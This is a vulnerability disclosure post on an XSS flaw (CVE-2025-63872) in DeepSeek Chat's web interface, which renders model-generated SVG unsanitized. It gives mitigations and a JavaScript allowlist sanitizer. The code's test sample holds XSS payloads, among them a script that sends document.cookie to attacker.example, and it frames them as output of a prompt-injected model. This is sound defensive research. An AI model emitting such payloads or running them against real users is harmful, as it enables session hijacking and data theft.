Discovered by Vinit Kundu

A client-side XSS vulnerability allowing JavaScript execution through model-generated SVG content.

Overview

I recently discovered a security vulnerability in DeepSeek Chat V3.2 involving unsafe rendering of model-generated SVG, which can result in arbitrary JavaScript execution in the user's browser.

MITRE has formally assigned this issue CVE-2025-63872.

This post documents the vulnerability, its impact, a safe proof of concept, and the disclosure timeline.

This article contains non-exploit, defensive security research performed entirely for educational and responsible disclosure purposes.

Vulnerability Summary (CVE-2025-63872)

DeepSeek Chat's web interface directly inserts model-generated SVG fragments into the DOM without sanitizing:

  • Event attributes like onload, onerror, onclick
  • Script-capable SVG constructs
  • External resource references (<image href="…">)
  • Embedded interactive content

Because inline SVG is live DOM that honours <script> elements and on* event-handler attributes exactly as HTML does, a crafted message executes JavaScript as soon as the browser renders it; no click or other interaction is needed.

Impact

Successful exploitation allows:

  • Arbitrary JavaScript execution in the DeepSeek Chat domain
  • Account/session compromise: HttpOnly only stops the script from reading the cookie, requests the injected script makes to the chat origin still carry it
  • Arbitrary authenticated requests (CSRF-equivalent actions) made with the victim's session
  • UI manipulation and phishing opportunities
  • Data exfiltration through remote requests

No user interaction is required other than viewing the message.

[Figure: Controlled PoC demonstration showing JavaScript execution via model-generated SVG in DeepSeek Chat (CVE-2025-63872). All sensitive content intentionally redacted.]

Affected Systems

  • DeepSeek Chat Web Interface (V3.2)
  • SVG parsing & message-rendering subsystem

Disclosure Timeline

2025-10-16 – Vulnerability reported to security@deepseek.com
2025-10-16 – MITRE notified
2025-10 to 2025-11 – Multiple follow-ups to the vendor, no response
2025-11-18 – MITRE assigns CVE-2025-63872
2025-11-19 – Public disclosure

Vendor Status

The vendor has not responded to any communication attempts as of publication. No patch information is available.

Mitigation Recommendations

For Users

  • Avoid opening untrusted shared chats or content that causes DeepSeek Chat to render SVG
  • Use non-web clients where possible
  • Log out after sessions and avoid persistent logins

For Vendor

  • Sanitize model output before inserting it into the DOM, for example with DOMPurify configured with its SVG profile (USE_PROFILES: { svg: true }); use an allowlist of elements and attributes, not a denylist
  • Strip all on* event-handler attributes and script-capable elements (<script>, <foreignObject>, SMIL <set>/<animate>) and reject href values that are not same-document fragments or inline raster images
  • Apply a strict Content Security Policy that forbids inline script (nonce- or hash-based script-src) and restricts img-src/connect-src, so an injected handler can neither run nor exfiltrate even if sanitization is bypassed
  • Consider rasterizing SVG server-side, or rendering it inside a sandboxed iframe served from a separate origin so that any script that does run has no access to the chat session
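As an added illustration of the rules in the Vulnerability Summary and in the vendor recommendations above, the following JavaScript is example code written for this article; it is not DeepSeek's code and not DOMPurify. It implements an allowlist filter for a model-generated SVG fragment that would otherwise be assigned to innerHTML: elements off the allowlist are removed, script-capable elements lose their entire subtree, on* handlers are dropped, character references are decoded before any value is inspected, and href/url() targets must be same-document fragments or inline raster data: images. The SAMPLE_SVG payload and the attacker.example hostname are constructed for the demonstration.

```javascript
// Added example for this article, not DeepSeek's code and not DOMPurify: an allowlist
// sanitizer for model-generated SVG fragments (see the lead-in for the rules it applies).
const ALLOWED_TAGS = new Set([
  'svg', 'g', 'path', 'rect', 'circle', 'ellipse', 'line', 'polyline', 'polygon', 'text', 'tspan',
  'defs', 'lineargradient', 'radialgradient', 'stop', 'title', 'desc', 'clippath', 'mask', 'symbol', 'use', 'image',
]);
// Whole subtree dropped: executes script, embeds foreign markup, or rewrites attributes (SMIL).
const DROP_SUBTREE = new Set(['script', 'foreignobject', 'style', 'iframe', 'object', 'embed',
  'set', 'animate', 'animatetransform', 'animatemotion']);
// Presentation attributes only; `style` is deliberately absent (CSS url() exfiltration).
const ALLOWED_ATTRS = new Set([
  'id', 'class', 'x', 'y', 'x1', 'y1', 'x2', 'y2', 'cx', 'cy', 'r', 'rx', 'ry', 'd', 'points',
  'width', 'height', 'viewbox', 'fill', 'stroke', 'stroke-width', 'opacity', 'transform', 'offset',
  'stop-color', 'font-size', 'font-family', 'text-anchor', 'xmlns', 'xmlns:xlink', 'href', 'xlink:href',
  'clip-path', 'mask',
]);
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', tab: '\t', newline: '\n' };

// Decode character references the way the browser will, so every check runs on the value
// the browser sees ("&#106;avascript:" is "javascript:").
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, body) => {
    if (body[0] !== '#') return NAMED[body.toLowerCase()] ?? m;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}
function escapeAttr(v) {
  return v.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}
// Link targets: same-document fragments or inline raster images only. ASCII control
// characters are stripped first because URL parsing ignores them ("jav\tascript:").
function safeHref(value) {
  const v = value.replace(/[\u0000-\u0020\u007f]/g, '');
  return v.startsWith('#') || /^data:image\/(png|jpeg|gif|webp);base64,[a-z0-9+/=]*$/i.test(v);
}
function filterAttributes(raw) {
  const out = [];
  const re = /([^\s=\/>"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  for (const m of raw.matchAll(re)) {
    const name = m[1].toLowerCase();
    const value = decodeEntities(m[2] ?? m[3] ?? m[4] ?? '');
    if (name.startsWith('on') || !ALLOWED_ATTRS.has(name)) continue;   // event handlers, unknowns
    if (name === 'href' || name === 'xlink:href') {
      if (!safeHref(value)) continue;
    } else if (/url\((?!["']?#)/i.test(value.replace(/[\u0000-\u0020]/g, ''))) {
      continue;   // url(...) to anything but a local fragment: external fill, mask, clip-path
    }
    out.push(`${m[1]}="${escapeAttr(value)}"`);
  }
  return out.length ? ' ' + out.join(' ') : '';
}
// Comment | CDATA | PI | doctype | close tag | open tag (quote-aware attrs) | text | stray '<'
const TOKEN = /<!--[\s\S]*?-->|<!\[CDATA\[[\s\S]*?\]\]>|<\?[\s\S]*?\?>|<![^>]*>|<\/([a-zA-Z][\w:.-]*)\s*>|<([a-zA-Z][\w:.-]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>|([^<]+)|</g;

function sanitizeSvg(fragment) {
  const out = [];
  const open = [];                        // { name (lowercase), tag (as written), kept }
  let dropName = null, dropDepth = 0;     // element whose subtree is being discarded
  for (const [tok, closeName, openName, rawAttrs, text] of fragment.matchAll(TOKEN)) {
    const selfClosing = openName !== undefined && /\/\s*$/.test(rawAttrs);
    if (dropName !== null) {              // inside a dropped subtree: track nesting of that element only
      if (openName && openName.toLowerCase() === dropName && !selfClosing) dropDepth++;
      else if (closeName && closeName.toLowerCase() === dropName && --dropDepth === 0) dropName = null;
      continue;
    }
    if (openName !== undefined) {
      const name = openName.toLowerCase();
      if (DROP_SUBTREE.has(name)) { if (!selfClosing) { dropName = name; dropDepth = 1; } continue; }
      const kept = ALLOWED_TAGS.has(name);  // unknown element: its tag is removed, children are kept
      if (kept) out.push(`<${openName}${filterAttributes(rawAttrs.replace(/\/\s*$/, ''))}${selfClosing ? '/' : ''}>`);
      if (!selfClosing) open.push({ name, tag: openName, kept });
    } else if (closeName !== undefined) {
      const name = closeName.toLowerCase();
      let i = open.length - 1;
      while (i >= 0 && open[i].name !== name) i--;
      if (i < 0) continue;                // stray close tag
      while (open.length > i) { const e = open.pop(); if (e.kept) out.push(`</${e.tag}>`); }
    } else if (text !== undefined) {
      out.push(text);                     // delimited by '<', so it holds no markup
    } else if (tok === '<') {
      out.push('&lt;');                   // unparseable '<' becomes literal text
    }                                     // comments, CDATA, PIs and doctypes are dropped
  }
  while (open.length) { const e = open.pop(); if (e.kept) out.push(`</${e.tag}>`); }
  return out.join('');
}

// Constructed sample of what a prompt-injected model might emit; attacker.example is a placeholder.
const SAMPLE_SVG = [
  '<svg xmlns="http://www.w3.org/2000/svg" width="120" height="40" onload="alert(document.domain)">',
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '<rect x="0" y="0" width="120" height="40" fill="url(https://attacker.example/leak)"/>',
  '<image href="https://attacker.example/t.png" x="0" y="0" width="20" height="20"/>',
  '<a href="&#106;avascript:alert(1)"><text x="10" y="25" onclick="alert(2)">Click</text></a>',
  '<foreignObject width="100" height="40"><iframe srcdoc="&lt;script&gt;alert(3)&lt;/script&gt;"></iframe></foreignObject>',
  '<set attributeName="onmouseover" to="alert(4)"/><use href="#legit"/><circle cx="5" cy="5" r="3" fill="url(#grad)"/></svg>',
].join('\n');
console.log(sanitizeSvg(SAMPLE_SVG));
```

Running it with node prints the sample with the onload handler, the <script>, the external fill and image references, the javascript: link, the <foreignObject> subtree and the SMIL <set> all removed, while the rect, text, same-document <use> and url(#grad) fill survive. The design choices are the ones listed above: allowlisting rather than denylisting, decoding character references before inspecting a value, stripping control characters before checking a URL scheme, and discarding the whole subtree of script-capable elements. A production deployment should still use a DOM-based library such as DOMPurify, which works on the browser's own parse tree and so is not exposed to differences between a hand-written tokenizer and the HTML parser, and should pair it with a CSP that forbids inline script.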

Credit

Discovered by: Vinit Kundu
CVE: CVE-2025-63872

Final Notes

This advisory reflects responsible disclosure efforts and 30+ days of attempted vendor contact without response. If DeepSeek publishes a fix, I will update this article with remediation details.

Disclaimer

This research was carried out entirely in a good-faith, ethical manner and was limited strictly to my own account, data, and browser session. I did not attempt to access, modify, disrupt, or interfere with any other user's data or any internal systems belonging to DeepSeek or its operators.

The goal of this disclosure is to raise security awareness and help the vendor and the community improve platform safety. No exploit code, harmful payloads, or instructions for weaponization are included in this report.

This publication does not encourage, endorse, or support misuse of the information contained herein. Any attempt to exploit vulnerabilities without authorization is illegal and unethical. The author is not responsible for misuse of this information by others.